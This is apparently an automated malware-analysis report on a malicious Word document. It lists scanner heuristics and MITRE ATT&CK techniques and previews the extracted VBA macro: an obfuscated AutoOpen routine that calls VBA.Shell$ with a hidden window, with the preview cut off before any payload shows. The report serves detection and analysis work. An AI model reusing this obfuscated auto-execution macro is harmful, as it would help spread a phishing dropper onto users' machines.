MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
This Office document contains a malicious VBA macro, specifically an AutoOpen macro, which utilizes the Shell() function. This indicates an attempt to execute a secondary payload, likely a downloader or dropper, as suggested by the ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0'. The presence of the Shell() call and the auto-exec marker strongly suggest a malicious intent to compromise the user's system.
Heuristics 8
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 140657 bytes |
SHA-256: 20c8ca069fbd268d317ede73b7851a619fab321b2a2b2a2e8d4431381de5bfc4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "GPfWUfwQlpJB"
Attribute VB_Name = "QQzqDXApzs"
Attribute VB_Name = "FKTTfsU"
Sub AutoOpen()
njpIkFhloKhvts = Array(("MzvwhZkJ" + "tjfUpMDjLWsd" + "aOlmhhilooZGLV" + "fGWCXCP" + "aMvcGAk"), ("zhQZhLurDb" + "EvFOiqw" + "EApGtKN" + "alFblESa" + "vwXUMizvCK"))
UzRlIzf = Array(("JaWOTzTFzz" + "zdfpitajr" + "qKrAIqcUTT" + "ZwQzYiEUsZBw" + "KbpHirhSnATQf"), ("KJrldjcaj" + "rJLWMzwoN" + "pjBVlcl" + "lwwhtTuLBn" + "QKkuaPYfLF"))
DiCbZdIVzBuIp = Array(("SKQscBzIRztF" + "aFMwaOwsRiRu" + "DfoWWBuKH" + "IniEquN" + "iUrhQnE"), ("ussAjzzLw" + "UvbrKbSAE" + "sJGzDZja" + "VPARCHBRHY" + "pXGXaSdr"))
PPPjvbkm = Array(("zGPXlcDTdYjIKL" + "vTUDiXkwsQK" + "zRVbWPX" + "StSldUGo" + "HBFDnoc"), ("hEXMKXHb" + "DCIzMtmBJB" + "jZNQvrk" + "ECLdsUpKz" + "IVLJHQEjHuHSBi"))
cXIqHQSnrXTr = Array(("QcXimDBjpZ" + "wLPkqHlAh" + "QzjUshpiTmnZj" + "iXYfwcFnw" + "uvAhwjlSJhzfq"), ("uWLwVniXf" + "GSjGCFldzqazjI" + "jAUPwQzjKlcR" + "RLLWQBbd" + "fQEvWfz"))
zpDMlmJIjiGmY = Array(("aodLniDjfh" + "iVEKCuTj" + "omOvjYCOjT" + "rbKpQSLrVk" + "JVFCQEzdo"), ("FDjnZifPcpwM" + "QHLPtkjb" + "lYdsqdIw" + "GfilYiBqj" + "ctvTzJovFoE"))
EKuSIKhsCGiZq = Array(("diijOCBDzSpE" + "iBhCJLNaXqG" + "qJrdWOWdQj" + "NYaBrBLc" + "DfzrUDVNcGF"), ("cKXtKacDTbOCq" + "diKWZMOdSL" + "zIStIBJa" + "kODIhaiZJc" + "wAzZmDFht"))
wrLjKRKJKZ = Array(("cUjPiBp" + "dpUquNzJsGFvcj" + "mXrYWJXPwCLUjQ" + "IBPjPkdA" + "WLISCEicv"), ("wrmdTpFZWn" + "sSshwEfsQNJW" + "CLAFMtYjYJT" + "WXwuJKHNi" + "sPkEAwjiJnU"))
VBA.Shell$ SjhfFYcGMspiK, 0
bHoANcPz = Array(("JZOcjiwGDC" + "sYTlVHtZ" + "uAfwKwpGJziziJ" + "pWcTPlXFlLTC" + "DiFjpAaItPRjt"), ("zFYLJPkvwfZKN" + "uunquBCisv" + "ijawHKjV" + "aANzJmEHjZJfm" + "Nzbbpsp"))
NcDbjJzrU = Array(("oUvuhnhHwuwSl" + "vfMwfjudDIm" + "wiGuIpETqRIT" + "ouhvuTvqZ" + "AwCMlvLRnIz"), ("zACmJNSmiXtfq" + "MhIprtWCGwGcT" + "fAVKUzuhtI" + "hYnBdCXV" + "jdIzQDUzuEfjtu"))
dCjKtuio = Array(("fJUjAdv" + "HXoCrXuQczno" + "dnijXaTMbBE" + "ISHjkwQJwZWFE" + "fouQwrzXBWqC"), ("CbWfWkMjEmh" + "AWfjERYblviSL" + "MpkRlsi" + "OhZtzVsDbC" + "YvUTrzES"))
qHzEURXXwmB = Array(("JjIwHKRCjiUcF" + "IrWtTjZGdGkU" + "izUEoAXOPM" + "knnPrInUwi" + "fBETVPDC"), ("OmljEOd" + "chXtfBJjtJO" + "TPVrZRTAUf" + "LNKGzBEL" + "fHsRKPAAvmc"))
End Sub
Function LWzvwbWDQ()
qCXKc = ("TRQucFKnH" + "alHfIAdLlWqoIP" + "rUWiTabzUOkEw" + "KqnKaLmAGRiFvw" + "biJAClloFnYzmn" + "XvjPbfCih") + ("FqNEDOi" + "CskbDuLZBiX" + "LANqtiZ" + "XRZAcwwuXkBZ" + "WjujwsmDCdTGis" + "dXKVozF")
zhvME = ("JfwSmcI" + "zvptMBrQWuHa" + "OVdKlpFfUnM" + "GfOOWKHXn" + "ftjnXuCHjMG" + "uJVIAmCCcHc") + ("FWdBAkzDskq" + "awSLdNHAKjkE" + "NKUUkBXRHhBQA" + "wMChKTli" + "UrZPAbS" + "lYImaiiHjT")
iwXRiLfVa = Mid("ENuAZz JVdOhmYlBubkDhElVGEQUuhzSiXqlc", 7, 3)
DdPjnCrnN = ("TjwGzQBRjzIp" + "SJzpmcUnF" + "zDsRzZjkwQzawz" + "onAMmJWDnKON" + "CUlwOqBDFzC" + "AMLZRsMzDwpUb") + ("kbAEGlMAi" + "fCMGwijnzTm" + "KdVSBObEfQVvGZ" + "AtRjzij" + "PfGCVOCWIjnRWi" + "kzYiwPhQAWfjt")
PiQNouifsM = ("hwkmrTkt" + "iwGzusjsrNQ" + "tZzEZddqm" + "UdUFwiZvF" + "zjDWkmmu" + "urTSqnXliRpGD") + ("NdciowBTvIJUN" + "cUnrjzsYBL" + "SZtqdQBurqs" + "HzwpavLJ" + "ZBIOdwWDwo" + "RAWWIcSsIaW")
AEjYjwL = ("nmSajGmuLGpc" + "NPSIjREhibznf" + "OGjpiIqUuVqm" + "BplSoTVUBiN" + "SpzELSnEZXofQL" + "DsVwSupCrw") + ("LTJNNYSr" + "TqQiDDiC" + "AGBdzSbjlvE" + "mHHBHTvLKQN" + "zBMcmsOLmY" + "qIhUqljmXmiji")
SBFiOL = Mid("MoiRMkWmGqCwaYXhQiwEtiwXM", 22, 2)
zzGBZ = ("kMjtlKRcqCI" + "XlcARiqvBPqGa" + "jwdTAvDVXCz" + "ktiLmPs" + "wWzRadkaiVV" + "SKdTzXBMpC") + ("aCMuwRpdb" + "wcJwLsXLc" + "CjYmaQKMPNjow" + "ZPNjoJos" + "LVhTVniiBMKLui" + "TfGcNNhIjA")
wiuCIT = ("azjqwajwohSP" + "QrEjAGla" + "QuWoilvHM" + "frKFckZKq" + "hjVtGIsm" + "dhLIHjpUHsw") + ("hUDkSGm" + "wbwvQljYcia" + "JfihTiCVnQSRr" + "ALSIoBGK" + "ClPsWzQrZSG" + "BlWRjDQnfIiDG")
FPpDhDw = ("winXTCKmMR" + "zpZkjiclzi
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.